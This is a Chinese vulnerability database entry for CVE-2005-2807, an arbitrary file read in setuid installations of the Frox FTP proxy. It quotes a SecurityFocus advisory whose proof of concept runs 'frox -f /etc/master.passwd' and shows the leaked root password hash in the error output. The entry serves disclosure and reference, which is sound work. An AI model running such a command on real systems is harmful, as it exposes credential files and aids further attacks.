Frox 任意配置文件访问漏洞

Frox 任意配置文件访问漏洞

漏洞ID 1109047 漏洞类型 输入验证
发布时间 2005-09-01 更新时间 2005-10-20
图片[1]-Frox 任意配置文件访问漏洞-安全小百科CVE编号 CVE-2005-2807
图片[2]-Frox 任意配置文件访问漏洞-安全小百科CNNVD-ID CNNVD-200509-060
漏洞平台 Linux CVSS评分 7.2
|漏洞来源
https://www.exploit-db.com/exploits/26218
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200509-060
|漏洞详情
Frox是一个开源的FTP透明代理,工作在BSD和其他使用ipfilter的操作系统下。frox0.7.18,运行setuid根目录时,在读取配置文件时无法正确分配权限,这样本地用户就可以通过-f命令选项任意读取一部分文件。
|漏洞EXP
source: http://www.securityfocus.com/bid/14711/info

Frox is prone to a vulnerability that permits read access to arbitrary files.

Successful exploitation of this vulnerability will grant the attacker read access to arbitrary files on the system in the security context of the Frox process. Information obtained may aid in further attacks against the underlying system; other attacks are also possible.

It should be noted that this issue is only exploitable if Frox is installed with setuid or setgid privileges. 

mq(/usr/local/sbin)-> frox -f /etc/master.passwd
Unrecognised option
"root:$2a$04$nR2msaB9.nAgR4qI6pqBNOQbH6LoqALZTmqsqhGEJLLwyTfsxXTd.:0:0::0:0:Charlie"
at line 3 of /etc/master.passwd
Error reading configuration file
|参考资料

来源:BID
名称:14711
链接:http://www.securityfocus.com/bid/14711
来源:BUGTRAQ
名称:20050901Filearibitaryreadaccessinfrox
链接:http://www.securityfocus.com/archive/1/409667

相关推荐: Adam_mmedici mtnpeak.net文件上传管理器授权问题漏洞

Adam_mmedici mtnpeak.net文件上传管理器授权问题漏洞 漏洞ID 1198892 漏洞类型 授权问题 发布时间 2005-06-12 更新时间 2005-06-12 CVE编号 CVE-2005-1957 CNNVD-ID CNNVD-20…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享